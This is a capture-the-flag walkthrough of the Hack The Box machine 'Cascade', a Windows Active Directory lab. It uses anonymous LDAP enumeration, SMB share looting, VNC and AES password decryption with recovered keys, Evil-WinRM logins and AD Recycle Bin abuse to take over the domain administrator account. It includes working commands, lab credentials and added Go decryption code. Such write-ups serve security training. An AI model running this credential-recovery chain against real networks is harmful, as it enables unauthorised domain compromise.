# Cascade

## Autorecon results

**Password:** PentestEverything

{% file src="<https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-337380549b18bb9a0f8583a10b3f830dfd0f059b%2F10.10.10.182%20-%20Cascade.zip?alt=media>" %}

## Nmap

```
nmap 10.10.10.182 -p- -Pn -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-02 18:33:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
```

{% hint style="info" %}
Add "10.10.10.182 cascade.local" to /etc/hosts.
{% endhint %}

Starting out on this machine, we run a simple `nmap` script scan against `LDAP` with null credentials.

```bash
nmap -n -sV --script "ldap* and not brute" '10.10.10.182'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd3da36171168119be31fa936d7347198de86ba6%2Fimage.png?alt=media)

Since that pulls back some information, we can try `ldapsearch` with `NULL` credentials now that we know the required domain information.

```bash
ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b0f9d2cd69bfc127dd83a2a92214c7aac0e4dce6%2Fimage.png?alt=media)

This spits out a serious amount of information, so the next step is to run it again and filter the output down to user accounts.

```bash
# Search for users, cleanup and output to file
ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" | grep "userPrincipalName" | sed 's/userPrincipalName: //' | sort > ADUsers.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b8021668b725067d501fa094eed09ee17610738%2Fimage.png?alt=media)

Now, with a list of users, we can start trying to find ways into the accounts. First up, we check the target domain for users with 'Do not require Kerberos preauthentication' set.

```bash
python2 /opt/impacket-0.9.19/examples/GetNPUsers.py cascade.local/ -usersfile ADUsers.txt -dc-ip 10.10.10.182
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0ff377a61ff0880a002c02923e62f73c1a8569d7%2Fimage.png?alt=media)

Unfortunately we get no results here...

I also attempted password spraying the accounts for quite some time. Again, nothing.

As `LDAP` has spewed so much data with `NULL` credentials, I decided to look again, this time using a graphical explorer.

```bash
sudo apt install jxplorer
```

We can log in using the following settings:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8f400cfc90c898e70eabcaea48a4991c493c09b5%2Fimage.png?alt=media)

After some time poring through the results manually, we come across an interesting attribute on the user *r.thompson*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d676e1d16614ea5d464e5a087a73f70e9b4de6ea%2Fimage.png?alt=media)

```
cascadeLegacyPwd:clk0bjVldmE=
```

Decoding the `Base64` value gives us a valid credential.

```
echo 'clk0bjVldmE=' | base64 -d
rY4n5eva
```

We now have the following credentials:

```
r.thompson:rY4n5eva
```
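As an added example (not part of the original write-up), the Go program below does what the `grep`/`sed` pipeline above does but on a proper parse of the `ldapsearch` LDIF output: it unfolds wrapped continuation lines, decodes `attr:: <base64>` values, drops the trailing search summary, and then flags custom attributes whose names suggest a credential and whose values base64-decode to printable text, which is exactly how `cascadeLegacyPwd` stood out. The sample LDIF is constructed to resemble the dump from this box and is not the real output; the function names (`ParseLDIF`, `FlagLegacySecrets`) are mine. For a defender this is the check to run against your own directory with an anonymous or low-privileged bind: anything it flags is readable by that same bind.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"fmt"
	"strings"
)

// Entry is one LDIF object: attribute name -> values ("dn" holds the DN).
type Entry map[string][]string

// ParseLDIF reads ldapsearch-style LDIF: folded continuation lines (leading space),
// "attr:: <base64>" values, "#" comments, blank-line separated blocks. Blocks with
// no dn (the trailing search/result summary, "ref:" referrals) are dropped.
func ParseLDIF(text string) []Entry {
	var entries []Entry
	cur := Entry{}
	lines := append(strings.Split(text, "\n"), "") // trailing "" flushes the last block
	for i := 0; i < len(lines); i++ {
		l := lines[i]
		for i+1 < len(lines) && strings.HasPrefix(lines[i+1], " ") { // unfold
			l += lines[i+1][1:]
			i++
		}
		if strings.TrimSpace(l) == "" {
			if len(cur["dn"]) > 0 {
				entries = append(entries, cur)
			}
			cur = Entry{}
			continue
		}
		c := strings.Index(l, ":")
		if strings.HasPrefix(l, "#") || c < 0 {
			continue
		}
		name, rest := l[:c], l[c+1:]
		if strings.HasPrefix(rest, ":") { // "attr:: base64"
			if raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(rest[1:])); err == nil {
				rest = string(raw)
			}
		}
		cur[name] = append(cur[name], strings.TrimSpace(rest))
	}
	return entries
}

// Finding is a credential-looking attribute; Text is its value, base64-decoded
// when that yields printable ASCII (the cascadeLegacyPwd case).
type Finding struct{ DN, Attr, Text string }

// FlagLegacySecrets matches attribute names ending in pwd/password/passwd/secret
// or containing "legacy": schema extensions such as cascadeLegacyPwd, but also a
// LAPS ms-Mcs-AdmPwd that an anonymous or low-privileged bind should never see.
func FlagLegacySecrets(entries []Entry) []Finding {
	var out []Finding
	for _, e := range entries {
		for name, vals := range e {
			ln := strings.ToLower(name)
			if !(strings.HasSuffix(ln, "pwd") || strings.HasSuffix(ln, "password") ||
				strings.HasSuffix(ln, "passwd") || strings.HasSuffix(ln, "secret") || strings.Contains(ln, "legacy")) {
				continue
			}
			for _, v := range vals {
				f := Finding{DN: e["dn"][0], Attr: name, Text: v}
				raw, err := base64.StdEncoding.DecodeString(v)
				if err == nil && len(raw) > 0 && bytes.IndexFunc(raw, func(r rune) bool { return r < 0x20 || r > 0x7e }) < 0 {
					f.Text = string(raw)
				}
				out = append(out, f)
			}
		}
	}
	return out
}

// sampleLDIF is constructed to resemble the box's dump; it is not the real output.
const sampleLDIF = `dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=
description:: Unlhbg==

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: s.smith
userPrincipalName: s.smith@cascade.local
memberOf: CN=Remote Management Users,CN=Builtin,DC=cascade,
 DC=local

search: 2
result: 0 Success
`

func main() {
	for _, f := range FlagLegacySecrets(ParseLDIF(sampleLDIF)) {
		fmt.Printf("%s %s -> %q\n", f.DN, f.Attr, f.Text)
	}
}
```

On a real dump, feed the file contents to `ParseLDIF`; `e["userPrincipalName"]` on each entry is the parsed equivalent of the user list above, and `e["memberOf"]` gives the group memberships that decide whether `WinRM` is worth trying. `ldapsearch -o ldif-wrap=no` avoids line folding, but the parser handles folded output either way.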

We can see from the `LDAP` results above that *r.thompson* is not a member of the Remote Management Users group, so `WinRM` will not work here.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-197353e398e571e6acf32f30724e9bda684efc8f%2Fimage.png?alt=media)

As the credentials are valid, we can try to download the contents of selected shares.

```bash
smbclient -U 'r.thompson' '\\10.10.10.182\Data\' -c 'prompt OFF;recurse ON; mget *'  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf976b2fe4d59146bee978b6dc2d01ad1ce4527b%2Fimage.png?alt=media)

Under `/IT/Temp/s.smith/` we have a file called `"VNC Install.reg"`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e6a4ef804bdf33c0cef05f75595a4d46c350bfaf%2Fimage.png?alt=media)

The password field in that registry export holds the following hex value:

```
6bcf2a4b6e5aca0f
```

After a little research on Google, we find the value can be decrypted using the following command.

```bash
echo -n "6bcf2a4b6e5aca0f" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae3753d677030f228cb682c5a24616c9dd442d7e%2Fimage.png?alt=media)

This gives us the credentials:

```
s.smith:sT333ve2
```

We know from enumeration earlier that s.smith is a member of the AD group "Audit Share".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9snRYwNeCo4hYC2Gx4UR%2Fimage.png?alt=media\&token=2a5f6d55-9a8a-413e-9f5d-9fa334a14919)

Knowing this, we can guess that they have access to the `AUDIT$` `SMB` share.

```bash
smbclient -U 's.smith' '\\10.10.10.182\AUDIT$\' -c 'prompt OFF;recurse ON; mget *'  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-843fce222cb3c3a04e3f8ed5cdeac9f3d58bd44d%2Fimage.png?alt=media)

Opening the `Audit.db` database file from the DB folder shows a `Base64` encoded value for the *ArkSvc* user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9096041e4c04fbd4853bdf6251b3350c1ed7884%2Fimage.png?alt=media)

```bash
echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d
```

The decoded output is not printable text, so the value is encrypted rather than merely encoded.

To read the `exe` and `DLL` files included in the `SMB` share, we need to jump onto a Windows host and use `dnSpy`.

**Github**: <https://github.com/dnSpy/dnSpy/releases>

Opening both `CaseCrypto.dll` and `CaseAudit.exe` in dnSpy and reading the code carefully gives us the following values:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9037e99075bfbba0221a6b4fc36e91cc487413d2%2FDLL-DNSspy.PNG?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-799fe52f4de9b98621a879796b0ee1b1efc3a9be%2Fexe-DNSspy.PNG?alt=media)

```
IV:1tdyjCbY1Ix49842
Key:c4scadek3y654321
Mode:CBC
Size:128
```

This information can be plugged into the following website to decrypt the string.

**URL:** <https://www.devglan.com/online-tools/aes-encryption-decryption>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e07d0bbebcf1ff4fc1728daabce5452dffc8081%2Fimage.png?alt=media)

This gives us the credentials:

```
arksvc:w3lc0meFr31nd
```
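Both secrets recovered so far come from reversible storage: the VNC registry value is DES under a fixed key that every VNC build ships with (the `-K` value in the `openssl` command above), and the `Audit.db` value is AES-128-CBC under a key and IV compiled into the audit tool, so anyone who can read the executables can decrypt every entry. The Go program below is an added example, not the author's or the box's code; it reproduces both decryptions offline from the values shown on this page (function names are mine; the only inputs are the hex string, the base64 string, the key and the IV above). The PKCS#7 check is deliberate: with a wrong key or IV the AES path returns a padding error instead of plausible-looking junk.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
)

// vncObfuscationKey is the constant DES key built into RealVNC/TightVNC for
// storing passwords. It is public, so a VNC .reg export is a plaintext
// credential in disguise, not an encrypted one.
var vncObfuscationKey = []byte{0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0}

// RecoverVNCPassword reverses the VNC password store: DES-CBC, zero IV, no
// padding, password NUL-padded to 8 bytes. Input is the hex from the .reg file.
func RecoverVNCPassword(hexValue string) (string, error) {
	ct, err := hex.DecodeString(hexValue)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return "", errors.New("vnc: ciphertext must be a non-empty multiple of 8 bytes")
	}
	block, err := des.NewCipher(vncObfuscationKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, des.BlockSize)).CryptBlocks(pt, ct)
	return string(bytes.TrimRight(pt, "\x00")), nil
}

// RecoverAuditSecret reverses what the audit tool does: AES-128-CBC with the
// key and IV shipped inside the binaries, PKCS#7 padding, base64 output.
func RecoverAuditSecret(b64 string, key, iv []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("aes: ciphertext must be a non-empty multiple of 16 bytes")
	}
	if len(iv) != aes.BlockSize {
		return "", errors.New("aes: iv must be 16 bytes")
	}
	block, err := aes.NewCipher(key) // fails unless the key is 16, 24 or 32 bytes
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// pkcs7Unpad validates the padding before stripping it, so a wrong key or IV
// surfaces as an error rather than as garbage that looks like a password.
func pkcs7Unpad(b []byte) (string, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return "", errors.New("pkcs7: invalid padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return "", errors.New("pkcs7: invalid padding")
		}
	}
	return string(b[:len(b)-n]), nil
}

func main() {
	// The inputs below are the values shown in the write-up.
	pw, err := RecoverVNCPassword("6bcf2a4b6e5aca0f")
	fmt.Println("VNC:", pw, err)
	pw, err = RecoverAuditSecret("BQO5l5Kj9MdErXx6Q6AGOw==", []byte("c4scadek3y654321"), []byte("1tdyjCbY1Ix49842"))
	fmt.Println("ArkSvc:", pw, err)
}
```

The defensive fix here is not a stronger cipher. A service account whose password must be recoverable by a tool on a file share is the problem: a group Managed Service Account removes the need to store the password at all, the audit database should not sit on a share readable by ordinary users, and `.reg` exports of VNC configuration should never be left in a user's temp folder.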

With these, we can log in over `WinRM` with `Evil-WinRM`.

```bash
evil-winrm -u 'arksvc' -p 'w3lc0meFr31nd' -i '10.10.10.182'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-23ce3dc9197f993474c174c1265daf3a65d11c1e%2Fimage.png?alt=media)

Looking at our group memberships, we see we are a member of the group *"AD Recycle Bin"*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b79a44d847f01a63e40a120e9a063d854ba10112%2Fimage.png?alt=media)

We can use the `PowerShell` AD module to list deleted users.

```powershell
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-86b80c5b38ee3a973429a862712c6a3e78c9e68b%2Fimage.png?alt=media)

```bash
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d 
```

Credentials:

```
tempadmin:baCT3r1aN00dles
```

From enumerating the `SMB` shares earlier, we came across the following file in the Data share:

`Meeting_Notes_June_2018.html`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae623d5cc578c243074e0b81f36d460888a57c2a%2Fimage.png?alt=media)

With this information, we can then log in as the administrator account and grab the root flag.

```bash
evil-winrm -u 'administrator' -p 'baCT3r1aN00dles' -i '10.10.10.182' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f711c88fc29b85949400bb9698c38e1fb5f22d7%2Fimage.png?alt=media)
